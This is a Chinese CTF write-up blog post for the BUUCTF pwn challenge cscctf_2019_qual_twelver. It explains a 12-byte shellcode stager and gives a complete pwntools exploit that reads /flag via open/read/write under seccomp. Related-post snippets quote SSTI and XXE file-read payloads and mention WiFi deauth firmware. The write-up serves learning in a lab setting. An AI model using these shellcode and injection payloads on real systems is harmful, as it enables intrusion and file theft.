[BUUCTF-pwn] cscctf_2019_qual_twelver

最新推荐文章于 2022-05-01 20:10:44 发布
最新推荐文章于 2022-05-01 20:10:44 发布
阅读量286 收藏
点赞数
分类专栏: CTF pwn 文章标签: python c语言 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121452769
版权

如果读rip

这题去执行shellcode跟版本和保护都没关系,先看程序

  src[0] = 0x3148DB3148C03148LL;  //xor rax,rax ....除rip外所有
  src[1] = 0x48F63148D23148C9LL;
  src[2] = 0xE43148ED3148FF31LL;
  src[3] = 0x314DC9314DC0314DLL;
  src[4] = 0x4DE4314DDB314DD2LL;
  src[5] = 0xFF314DF6314DED31LL;
  v5 = 0;
  dest = (char *)mmap(0LL, 0x1000uLL, 7, 34, -1, 0LL);  //写入可写可执行段
  memcpy(dest, src, 0x30uLL);
  write(1, "Shellcode > ", 0xCuLL);  
  read(0, dest + 48, 0xCuLL);     //读入12字节到src后边
  setup_seccomp();                //关掉execve
  ((void (*)(void))dest)();       //从src开始执行
  exit(0);

程序很短也很简单(因为难点不在这)

  1. 先申请一个可写可执行的块,然后把一些shellcode写进去
  2. shellcode的内容是清掉除rip的寄存器
  3. 读入12字节到shellcode后边
  4. 关闭execve
  5. 开始执行

对策也很简单,由于只能写入12字节,这时寄存器又都是0,所以先要用12字节获取当前地址,最重要的是恢复rsp,然后读后续shellcode进来。

这里有个坑,rip是仅存的寄存器,但rip是不可读的,这里有个rcx, 

read(0,0,0)后返回rip的值到rcx。

所以这就好办了,shellcode分3部分:

  1. syscall  执行完后rcx会有rip的值
  2. 用rcx填充rsi,rsp 然后read后续shellcode
  3. 用shellcraft作ORW

完整exp:

from pwn import *

context(arch = 'amd64',log_level = 'debug')

#p = process('./pwn')
p = remote('node4.buuoj.cn', 26292) 

payload1 = asm('syscall; mov dh,0x100>>8; mov rsi,rcx; mov rsp,rcx; syscall').ljust(0xc, b'\x90')
p.sendafter(b' > ', payload1)
sleep(0.1)
payload2 = b'\x90'*0x10 + asm(shellcraft.open('/flag') + shellcraft.read(3,'rsp',0x100) + shellcraft.write(1,'rsp',0x100))
p.send(payload2)

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-pwn(12)
njh18790816639的博客
01-13 2878
[极客大挑战 2019]Not Bad orw类型,打开文件,读入内容,输出内容!但需要注意gadget! from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './bad' r = remote('node4.buuoj.cn',29934) #r = process(binary) elf = ELF(binary) mnap = 0x123000 jmp_rsp = 0x0400a01 r.r
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
[CSCCTF 2019 Qual]FlaskLight
07-06 268
打开题目,F12查看源码有提示,提示可以使用search参数,或者使用Arjun直接扫描也可以扫描出search参数, 使用下面爆出类, {{().__class__.__base__.__subclasses__()}} [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'b
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
末初的CSDN博客
07-26 2747
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 f
buuoj Pwn writeup 116-120
yongbaoii的博客
05-11 236
116 roarctf_2019_realloc_magic 117 [BJDCTF 2nd]rci 118 wustctf2020_number_game 119 picoctf_2018_are you root 120 [GKCTF2020]Domo
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
[CSCCTF 2019 Qual]FlaskLight SSTI注入
qq_54929891的博客
04-05 2287
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49,既然我们可以利用{{}},又有输出点,直接模板注入GOGOGO python-flask模块注入(SSTI) - ctrl_TT豆 - 博客园因为不太熟,只能一步步来 ''.__class__ //先随便查看一个字符所属的类是什么 ''.__class__.__mro__ //返回...
[BUUCTF-pwn]——qctf2018_stack2
Y_peak的博客
04-02 355
[BUUCTF-pwn]——qctf2018_stack2 这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去 漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据. 还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4 主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试. 第一次执行该汇编的时候, eax就是我们开始输入的位置 然后直接定位到retn看栈顶
buuctf刷题记录(一)
qq_43571856的博客
08-03 364
vn_pwn_warmup 开了nx和pie 这里给了puts的地址,可以得到libc的基地址 只有这里有个溢出点能溢出0x10个字节 原本的想法是直接用one_gadget来获得shell 但是一直都打不通,由于开了pie也没法本地调试 后来看了大佬的题解,才知道这个题禁用了execve。现在也不知道从哪里看出来的。 对于这种禁用execve或者没法使用system直接getshell的题。 我们可以使用orw来做。 可以把paylaod写到这里 然后在跳到这里执行 但是这个题没法用题目文件里的r
buuoj Pwn writeup 151-155
yongbaoii的博客
05-28 374
151 ciscn_2019_sw_1 保护 要注意到的是RELRO一点没开,这意味着.fini_array是可以覆盖的。 栈上的格式化字符串。 system也有了。 printf只能用一次,但是我们前面说.fini_array可以覆盖,所以我们第一次先覆盖它为main,制造循环,然后劫持scanf的got表,进行利用就好。 要注意的是在我们覆盖.fini_array的意思是在返回的时候以此调用里面的函数,而这个题.fini_array数组只有一个数组,所以我们只能通过它来返回一次main函数,所以我们一
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5
Y_peak的博客
02-21 324
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5 题目地址:https://buuoj.cn/challenges#[第五空间2019%20决赛]PWN5 题目: 这是一道格式化字符串的题,给大家讲解下 checksec一下看看, 开启了canary保护, 基本开启这个保护都会用到格式化字符串的漏洞。 在IDA中 利用pwndbg看看, 偏移是多少。 0xa也就是 10 思路 利用格式化字符串漏洞, 修改unk_804C044的值, 并且输入相等的值 exploit from p
BUUCTF:[CSAWQual 2019]Web_Unagi
末初的CSDN博客
04-06 1908
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
Pwn篇-BUUCTF[第五空间2019 决赛]PWN5-格式化字符串漏洞
weixin_44644249的博客
04-10 268
BUUCTF[第五空间2019 决赛]PWN5 简单的格式化字符串漏洞利用题目 程序保护 IDA分析 程序逻辑如下: unk_804c044为bss段地址,存储上面生成的4字节随机数。只要随机数和我们输入的passwd相等,则调用system("/bin/sh") 程序中有明显的格式化字符串漏洞,可以任意地址读写。 动态调试 GDB调试程序,计算偏移: 数得偏移为9,可以使用%9p来打印"aaaa"所在的地址 可以使用pwnlib中fmtstr_payload来自动构造payload,使用方法如
【Writeup】BUUCTF_Web_高明的黑客
BAKUMANSEC - Just Do It
08-19 1151
0x01 解题思路   这题下载源码一看似乎有很多一句话木马,但是大多数根本没法执行命令,而且文件和参数都比较多,所以比较普遍的做法是本地搭个环境(PHP7)尝试所有的GET和POST参数。CTF Writeups给的wp:https://www.ctfwp.com/articals/2019qiangwang.html#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值